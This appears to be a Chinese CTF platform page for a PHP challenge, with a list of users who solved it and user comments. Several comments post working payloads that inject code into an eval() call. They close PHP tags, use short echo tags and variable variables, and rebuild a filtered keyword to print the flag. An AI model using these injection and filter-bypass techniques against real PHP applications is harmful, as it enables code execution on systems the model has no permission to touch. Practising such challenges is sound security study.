评分(6)
解题动态
tytu 攻破了该题 8小时前
Tomato薯条 攻破了该题 3天前
晚霞难掩秋色 攻破了该题 3天前
2117783710 攻破了该题 4天前
kxzzy 攻破了该题 4天前
粉红色的-毛 攻破了该题 5天前
凡尘桔子 攻破了该题 7天前
wbq012 攻破了该题 8天前
极品老学生 攻破了该题 11天前
ZZXL_ZZ 攻破了该题 11天前
3024769318 攻破了该题 12天前
shengood 攻破了该题 13天前
ndzdb 攻破了该题 13天前
fish12138 攻破了该题 17天前
dlgz 攻破了该题 18天前
bale 攻破了该题 18天前
2523822945 攻破了该题 23天前
747137939 攻破了该题 24天前
宋砚 攻破了该题 27天前
评论
FTJJJ 1月前
举报
?flag=$a=~'%99%93%9E%98';?><?= $$a ?>aaaaaaaaaaaaaaaaaaaaaaaaaa
harry2025 4月前
举报
eval()内出现孤立<,必报unexpected '<'错误,无例外。
网恋秀牛子被录屏导致自卑 4月前
举报
考察了闭合,还有短标签
南交混的入朱靖宇 5月前
举报
flag被过滤,构建$a='fla1';$a{*********}='g'; // 把字符串的第 4 个字符改成 g题里要求:strlen($_GET['flag']) == strlen($exam),而 $exam 的长度是 49。
Alune 6月前
举报
个人理解eval构造中存在<? ?> payload 第一个?>中与前一个闭合 而让后面的当作代码执行,不闭合的话后面就是<? <? ?> ?>代码嵌套代码了,会报错
孙谦的鸟岛 8月前
举报
孙千的**来咯
派大星CTF 1年前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 2年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 2年前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 2年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111